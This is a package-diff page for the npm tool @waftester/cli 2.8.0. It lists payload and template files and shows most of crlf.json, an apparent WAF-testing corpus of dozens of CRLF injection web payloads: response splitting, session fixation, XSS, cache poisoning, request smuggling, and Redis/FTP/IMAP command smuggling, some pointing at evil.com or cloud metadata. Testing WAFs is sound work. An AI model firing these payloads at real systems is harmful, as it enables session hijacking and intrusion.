npm - @waftester/cli - Versions diffs - 2.8.0 - Mend

@waftester/cli 2.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (141) hide show

package/LICENSE +80 -0
package/LICENSE-COMMUNITY +28 -0
package/README.md +121 -0
package/bin/cli.js +152 -0
package/package.json +52 -0
package/payloads/community/README.md +45 -0
package/payloads/community/ai/ml-poisoning.json +173 -0
package/payloads/community/ai/prompt-injection.json +247 -0
package/payloads/community/ai/workflow-abuse.json +222 -0
package/payloads/community/auth/jwt.json +855 -0
package/payloads/community/auth/login-bypass.json +623 -0
package/payloads/community/auth/mfa.json +402 -0
package/payloads/community/auth/oauth.json +421 -0
package/payloads/community/auth/open-redirect.json +1028 -0
package/payloads/community/auth/session.json +404 -0
package/payloads/community/cache/deception.json +402 -0
package/payloads/community/cache/poisoning.json +403 -0
package/payloads/community/deserialization/gadget.json +375 -0
package/payloads/community/deserialization/prototype.json +370 -0
package/payloads/community/fuzz/content-type.json +397 -0
package/payloads/community/fuzz/headers.json +401 -0
package/payloads/community/fuzz/methods.json +397 -0
package/payloads/community/fuzz/obfuscation.json +362 -0
package/payloads/community/fuzz/special-chars.json +740 -0
package/payloads/community/fuzz/waf-bypass.json +452 -0
package/payloads/community/graphql/batching-abuse.json +271 -0
package/payloads/community/graphql/depth-limit.json +271 -0
package/payloads/community/graphql/introspection.json +267 -0
package/payloads/community/injection/crlf.json +569 -0
package/payloads/community/injection/ldap.json +357 -0
package/payloads/community/injection/nosqli.json +529 -0
package/payloads/community/injection/oscmd.json +662 -0
package/payloads/community/injection/rce-polyglots.json +452 -0
package/payloads/community/injection/sqli.json +681 -0
package/payloads/community/injection/ssti.json +584 -0
package/payloads/community/injection/upload-attacks.json +632 -0
package/payloads/community/injection/xpath.json +357 -0
package/payloads/community/injection/xxe.json +716 -0
package/payloads/community/logic/forced-browsing.json +405 -0
package/payloads/community/logic/idor.json +1026 -0
package/payloads/community/logic/privilege.json +337 -0
package/payloads/community/media/exif-injection.json +225 -0
package/payloads/community/media/metadata-poison.json +239 -0
package/payloads/community/protocol/http-smuggling.json +798 -0
package/payloads/community/protocol/http2-attacks.json +382 -0
package/payloads/community/protocol/websocket-abuse.json +375 -0
package/payloads/community/rate-limit/burst-simulation.json +286 -0
package/payloads/community/rate-limit/bypass-attempts.json +326 -0
package/payloads/community/rate-limit/zone-tests.json +332 -0
package/payloads/community/services/authentik.json +415 -0
package/payloads/community/services/immich.json +423 -0
package/payloads/community/services/n8n.json +366 -0
package/payloads/community/sqli-basic.json +182 -0
package/payloads/community/ssrf/cloud-metadata.json +999 -0
package/payloads/community/ssrf/dns-rebinding.json +503 -0
package/payloads/community/ssrf/internal-networks.json +627 -0
package/payloads/community/ssrf/protocol-smuggling.json +350 -0
package/payloads/community/ssti/multi-language-templates.json +191 -0
package/payloads/community/ssti/python-templates.json +200 -0
package/payloads/community/traversal/basic.json +675 -0
package/payloads/community/traversal/cloud-credentials.json +107 -0
package/payloads/community/traversal/config-files.json +193 -0
package/payloads/community/traversal/encoding.json +558 -0
package/payloads/community/traversal/null-byte.json +105 -0
package/payloads/community/traversal/symlink.json +93 -0
package/payloads/community/traversal/unicode.json +134 -0
package/payloads/community/traversal/unix-advanced.json +195 -0
package/payloads/community/traversal/windows-advanced.json +195 -0
package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
package/payloads/community/waf-bypass/unicode-charset.json +152 -0
package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
package/payloads/community/waf-validation/README.md +172 -0
package/payloads/community/waf-validation/bypass-techniques.json +272 -0
package/payloads/community/waf-validation/custom-rules.json +952 -0
package/payloads/community/waf-validation/evasion-techniques.json +272 -0
package/payloads/community/waf-validation/modsecurity-core.json +151 -0
package/payloads/community/waf-validation/owasp-top10.json +236 -0
package/payloads/community/waf-validation/regression-tests.json +227 -0
package/payloads/community/xss/csp-bypass.json +431 -0
package/payloads/community/xss/dom.json +389 -0
package/payloads/community/xss/filter-bypass.json +1242 -0
package/payloads/community/xss/mutation.json +263 -0
package/payloads/community/xss/polyglots.json +371 -0
package/payloads/community/xss/reflected.json +187 -0
package/payloads/community/xss/stored.json +330 -0
package/payloads/crlf-injection.json +182 -0
package/payloads/ids-map.json +155 -0
package/payloads/ldap-injection.json +182 -0
package/payloads/nosql-injection.json +227 -0
package/payloads/prototype-pollution.json +182 -0
package/payloads/request-smuggling.json +182 -0
package/payloads/version.json +28 -0
package/payloads/xss-advanced.json +227 -0
package/templates/README.md +221 -0
package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
package/templates/output/asff.tmpl +61 -0
package/templates/output/csv.tmpl +4 -0
package/templates/output/junit.tmpl +34 -0
package/templates/output/markdown-report.tmpl +92 -0
package/templates/output/slack-notification.tmpl +95 -0
package/templates/output/text-summary.tmpl +56 -0
package/templates/overrides/api-only.yaml +130 -0
package/templates/overrides/crs-tuning.yaml +204 -0
package/templates/overrides/false-positive-suppression.yaml +159 -0
package/templates/policies/owasp-top10.yaml +152 -0
package/templates/policies/pci-dss.yaml +124 -0
package/templates/policies/permissive.yaml +40 -0
package/templates/policies/standard.yaml +57 -0
package/templates/policies/strict.yaml +72 -0
package/templates/report-configs/compliance.yaml +173 -0
package/templates/report-configs/dark.yaml +136 -0
package/templates/report-configs/enterprise.yaml +175 -0
package/templates/report-configs/minimal.yaml +84 -0
package/templates/report-configs/print.yaml +139 -0
package/templates/workflows/api-scan.yaml +132 -0
package/templates/workflows/ci-gate.yaml +129 -0
package/templates/workflows/full-scan.yaml +133 -0
package/templates/workflows/quick-probe.yaml +80 -0
package/templates/workflows/waf-detection.yaml +89 -0

package/payloads/community/injection/crlf.json ADDED Viewed

@@ -0,0 +1,569 @@
+[
+  {
+    "id": "CRLF-RESPONSE-SPLIT-001",
+    "payload": "GET /api/redirect?url=http://example.com%0d%0aSet-Cookie:%20admin=true HTTP/1.1",
+    "tags": ["crlf", "response-splitting", "cookie-injection", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRLF injection for Set-Cookie header injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-RESPONSE-SPLIT-002",
+    "payload": "GET /api/redirect?url=http://example.com%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>Injected</html>",
+    "tags": ["crlf", "response-splitting", "http-injection", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Full HTTP response injection via CRLF",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-RESPONSE-SPLIT-003",
+    "payload": "GET /api/page?name=test%0d%0aX-Injected-Header:%20malicious HTTP/1.1",
+    "tags": ["crlf", "header-injection", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Custom header injection via CRLF",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-RESPONSE-SPLIT-004",
+    "payload": "GET /api/redirect?url=%0d%0aLocation:%20http://evil.com HTTP/1.1",
+    "tags": ["crlf", "open-redirect", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRLF to inject Location header for redirect",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-RESPONSE-SPLIT-005",
+    "payload": "GET /api/user?name=test%0D%0AContent-Type:%20text/html%0D%0A%0D%0A<script>alert(1)</script>",
+    "tags": ["crlf", "xss", "response-splitting", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRLF with XSS payload injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-HEADER-001",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nX-Forwarded-For: 127.0.0.1%0d%0aX-Admin:%20true",
+    "tags": ["crlf", "header-injection", "privilege-escalation", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Header injection via X-Forwarded-For",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-HEADER-002",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nUser-Agent: Mozilla%0d%0aX-Injected:%20value",
+    "tags": ["crlf", "header-injection", "user-agent", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRLF injection in User-Agent header",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-HEADER-003",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nReferer: http://legitimate.com%0d%0aCookie:%20session=hijacked",
+    "tags": ["crlf", "header-injection", "cookie-injection", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Cookie injection via CRLF in Referer",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-HEADER-004",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com%0d%0aX-Forwarded-Host:%20evil.com",
+    "tags": ["crlf", "host-header", "cache-poisoning", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRLF in Host header for cache poisoning",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-ENCODING-001",
+    "payload": "GET /api/redirect?url=http://example.com%0a%0dSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "encoding", "lf-cr", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "LF-CR instead of CR-LF sequence",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-ENCODING-002",
+    "payload": "GET /api/redirect?url=http://example.com%0dSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "encoding", "cr-only", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CR-only line ending for header injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-ENCODING-003",
+    "payload": "GET /api/redirect?url=http://example.com%0aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "encoding", "lf-only", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "LF-only line ending for header injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-ENCODING-004",
+    "payload": "GET /api/redirect?url=http://example.com%E5%98%8A%E5%98%8DSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "unicode", "bypass", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Unicode CRLF bypass (U+560A U+560D)",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-ENCODING-005",
+    "payload": "GET /api/redirect?url=http://example.com%c0%8d%c0%8aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "overlong-utf8", "bypass", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Overlong UTF-8 CRLF encoding bypass",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-ENCODING-006",
+    "payload": "GET /api/redirect?url=http://example.com%250d%250aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "double-encode", "bypass", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Double URL-encoded CRLF",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-ENCODING-007",
+    "payload": "GET /api/redirect?url=http://example.com\\r\\nSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "escaped", "bypass", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Backslash-escaped CRLF",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-ENCODING-008",
+    "payload": "GET /api/redirect?url=http://example.com%u000d%u000aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "iis-unicode", "bypass", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "IIS %u Unicode CRLF encoding",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-LOG-INJECTION-001",
+    "payload": "GET /api/login?user=admin%0d%0a[SUCCESS]%20admin%20logged%20in HTTP/1.1",
+    "tags": ["crlf", "log-injection", "forensics", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Log injection via CRLF - fake success entry",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-LOG-INJECTION-002",
+    "payload": "GET /api/action?type=transfer%0d%0a127.0.0.1%20-%20admin%20[timestamp]%20\"GET%20/admin%20HTTP/1.1\"%20200 HTTP/1.1",
+    "tags": ["crlf", "log-injection", "forensics", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Log injection with fake access log entry",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-SMTP-001",
+    "payload": "POST /api/contact HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nemail=test@example.com%0d%0aBcc:%20attacker@evil.com",
+    "tags": ["crlf", "smtp-injection", "email", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SMTP header injection via email form",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-SMTP-002",
+    "payload": "POST /api/contact HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nfrom=test@example.com%0d%0aSubject:%20Phishing%0d%0a%0d%0aClick%20here:%20http://evil.com",
+    "tags": ["crlf", "smtp-injection", "email", "phishing", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Full email injection with custom body",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-CACHE-POISON-001",
+    "payload": "GET /api/page HTTP/1.1\r\nHost: target.com\r\nX-Forwarded-Host: evil.com%0d%0aX-Forwarded-Proto:%20https",
+    "tags": ["crlf", "cache-poisoning", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Cache poisoning via CRLF header injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-CACHE-POISON-002",
+    "payload": "GET /api/js/app.js HTTP/1.1\r\nHost: target.com%0d%0aX-Cache-Key:%20evil",
+    "tags": ["crlf", "cache-poisoning", "cache-key", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Cache key injection via CRLF in Host",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-SESSION-FIXATION-001",
+    "payload": "GET /api/redirect?url=http://example.com%0d%0aSet-Cookie:%20PHPSESSID=attacker_session HTTP/1.1",
+    "tags": ["crlf", "session-fixation", "cookie", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Session fixation via CRLF Set-Cookie injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-SESSION-FIXATION-002",
+    "payload": "GET /api/redirect?url=http://example.com%0d%0aSet-Cookie:%20JSESSIONID=attacker_session;%20Path=/;%20HttpOnly HTTP/1.1",
+    "tags": ["crlf", "session-fixation", "java", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Java session fixation with full cookie attributes",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-XSS-001",
+    "payload": "GET /api/redirect?url=http://example.com%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<script>alert(document.domain)</script>",
+    "tags": ["crlf", "xss", "response-splitting", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "XSS via CRLF response body injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-XSS-002",
+    "payload": "GET /api/data?callback=test%0d%0aContent-Type:%20text/html%0d%0aX-XSS-Protection:%200%0d%0a%0d%0a<script>alert(1)</script>",
+    "tags": ["crlf", "xss", "xss-protection-bypass", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "XSS with X-XSS-Protection header bypass",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-CORS-001",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nOrigin: http://legitimate.com%0d%0aAccess-Control-Allow-Origin:%20http://evil.com",
+    "tags": ["crlf", "cors-bypass", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CORS bypass via CRLF header injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-CORS-002",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com%0d%0aAccess-Control-Allow-Origin:%20*%0d%0aAccess-Control-Allow-Credentials:%20true",
+    "tags": ["crlf", "cors-bypass", "credential-theft", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Inject permissive CORS headers with credentials",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-CSP-BYPASS-001",
+    "payload": "GET /api/page HTTP/1.1\r\nHost: target.com%0d%0aContent-Security-Policy:%20default-src%20*",
+    "tags": ["crlf", "csp-bypass", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CSP bypass via CRLF header injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-CSP-BYPASS-002",
+    "payload": "GET /api/page HTTP/1.1\r\nHost: target.com%0d%0aContent-Security-Policy:%20script-src%20'unsafe-inline'%20'unsafe-eval'",
+    "tags": ["crlf", "csp-bypass", "xss-enabler", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Inject permissive CSP allowing inline scripts",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-WEBSOCKET-001",
+    "payload": "GET /api/ws HTTP/1.1\r\nHost: target.com\r\nUpgrade: websocket%0d%0aSec-WebSocket-Key:%20attacker_key",
+    "tags": ["crlf", "websocket", "hijacking", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "WebSocket hijacking via CRLF in Upgrade header",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-PATH-001",
+    "payload": "GET /api/file%0d%0aX-Injected:%20true HTTP/1.1",
+    "tags": ["crlf", "path-injection", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRLF injection in URL path",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-PATH-002",
+    "payload": "GET /api/file%0d%0a%0d%0a<html>Injected</html> HTTP/1.1",
+    "tags": ["crlf", "path-injection", "response-body", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Full response body injection via URL path",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-POST-BODY-001",
+    "payload": "POST /api/data HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nname=test%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<script>alert(1)</script>",
+    "tags": ["crlf", "post-body", "response-splitting", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Response splitting via POST body parameter",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-JSON-001",
+    "payload": "POST /api/data HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"name\":\"test\\r\\nX-Injected: true\"}",
+    "tags": ["crlf", "json", "header-injection", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRLF in JSON value for header injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-COOKIE-001",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nCookie: session=abc%0d%0aX-Admin:%20true",
+    "tags": ["crlf", "cookie", "header-injection", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Header injection via CRLF in Cookie header",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-MULTILINE-001",
+    "payload": "GET /api/redirect?url=http://example.com%0d%0aSet-Cookie:%20a=1%0d%0aSet-Cookie:%20b=2%0d%0aSet-Cookie:%20c=3 HTTP/1.1",
+    "tags": ["crlf", "multi-header", "cookie-injection", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Multiple cookie injection via single CRLF chain",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-CHUNKED-001",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com%0d%0aTransfer-Encoding:%20chunked",
+    "tags": ["crlf", "chunked", "smuggling", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Inject Transfer-Encoding for smuggling setup",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-CONTENT-LENGTH-001",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com%0d%0aContent-Length:%200%0d%0a%0d%0aPOST%20/admin%20HTTP/1.1",
+    "tags": ["crlf", "content-length", "request-smuggling", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Request smuggling via CRLF Content-Length injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-HRS-001",
+    "payload": "GET /api/page%20HTTP/1.1%0d%0aHost:%20target.com%0d%0a%0d%0aGET%20/admin HTTP/1.1",
+    "tags": ["crlf", "request-splitting", "hrs", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "HTTP Request Splitting via path injection",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-CONTINUATION-001",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nX-Custom: value%0d%0a%20continuation%0d%0aX-Injected:%20true",
+    "tags": ["crlf", "header-continuation", "bypass", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Header continuation (obs-fold) abuse",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-NULL-BYTE-001",
+    "payload": "GET /api/redirect?url=http://example.com%00%0d%0aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "null-byte", "bypass", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Null byte before CRLF to bypass filters",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-TAB-001",
+    "payload": "GET /api/redirect?url=http://example.com%0d%0a%09Set-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "tab", "whitespace-bypass", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Tab character after CRLF for header confusion",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-GRAPHQL-001",
+    "payload": "POST /graphql HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"query\":\"mutation { updateUser(name: \\\"test\\r\\nX-Admin: true\\\") }\"}",
+    "tags": ["crlf", "graphql", "header-injection", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CRLF injection in GraphQL mutation",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-API-KEY-001",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nX-API-Key: valid_key%0d%0aX-Admin-Key:%20backdoor",
+    "tags": ["crlf", "api-key", "privilege-escalation", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Admin key injection via CRLF in API key header",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-AUTHORIZATION-001",
+    "payload": "GET /api/data HTTP/1.1\r\nHost: target.com\r\nAuthorization: Bearer token%0d%0aX-Override-Auth:%20admin",
+    "tags": ["crlf", "authorization", "bypass", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Auth bypass via CRLF in Authorization header",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-SSRF-CHAIN-001",
+    "payload": "GET /api/proxy?url=http://internal%0d%0aHost:%20169.254.169.254 HTTP/1.1",
+    "tags": ["crlf", "ssrf", "cloud-metadata", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SSRF + CRLF to access cloud metadata",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-LDAP-001",
+    "payload": "GET /api/user?dn=cn=admin%0d%0a%0d%0a HTTP/1.1",
+    "tags": ["crlf", "ldap", "injection", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRLF in LDAP DN parameter",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-REDIS-001",
+    "payload": "GET /api/cache?key=test%0d%0aSET%20admin%20true%0d%0a HTTP/1.1",
+    "tags": ["crlf", "redis", "command-injection", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Redis command injection via CRLF",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-MEMCACHED-001",
+    "payload": "GET /api/cache?key=test%0d%0aset%20admin%200%200%201%0d%0a1%0d%0a HTTP/1.1",
+    "tags": ["crlf", "memcached", "command-injection", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Memcached command injection via CRLF",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-FTP-001",
+    "payload": "GET /api/download?file=test.txt%0d%0aUSER%20anonymous%0d%0aPASS%20evil@example.com%0d%0a HTTP/1.1",
+    "tags": ["crlf", "ftp", "command-injection", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "FTP command injection via CRLF",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-IMAP-001",
+    "payload": "GET /api/email?folder=INBOX%0d%0aLOGIN%20admin%20password%0d%0a HTTP/1.1",
+    "tags": ["crlf", "imap", "command-injection", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "IMAP command injection via CRLF",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-PERCENT-ENCODED-MIXED-001",
+    "payload": "GET /api/redirect?url=http://example.com%0D%0aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "mixed-encoding", "bypass", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Mixed case percent encoding (uppercase D, lowercase a)",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-HTML-ENTITY-001",
+    "payload": "GET /api/redirect?url=http://example.com&#13;&#10;Set-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "html-entity", "bypass", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "HTML entity encoded CRLF (decimal)",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-HTML-ENTITY-002",
+    "payload": "GET /api/redirect?url=http://example.com&#x0d;&#x0a;Set-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "html-entity", "hex", "bypass", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "HTML entity encoded CRLF (hexadecimal)",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-BASE64-001",
+    "payload": "GET /api/decode?data=aHR0cDovL2V4YW1wbGUuY29tDQpTZXQtQ29va2llOiBldmlsPXRydWU= HTTP/1.1",
+    "tags": ["crlf", "base64", "encoded", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Base64 encoded CRLF payload",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-DOUBLE-CRLF-001",
+    "payload": "GET /api/redirect?url=http://example.com%0d%0d%0a%0aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "double-crlf", "bypass", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Double CRLF sequence bypass attempt",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-REVERSE-001",
+    "payload": "GET /api/redirect?url=http://example.com%0a%0dSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "reverse", "lf-cr", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Reversed LF-CR instead of CR-LF",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-FRAGMENT-001",
+    "payload": "GET /api/redirect?url=http://example.com#fragment%0d%0aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "fragment", "bypass", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRLF after URL fragment",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-QUERY-001",
+    "payload": "GET /api/redirect?url=http://example.com?query=1%0d%0aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "query-string", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "CRLF in URL with existing query string",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-PADDING-001",
+    "payload": "GET /api/redirect?url=http://example.com%20%20%20%0d%0aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "padding", "whitespace", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
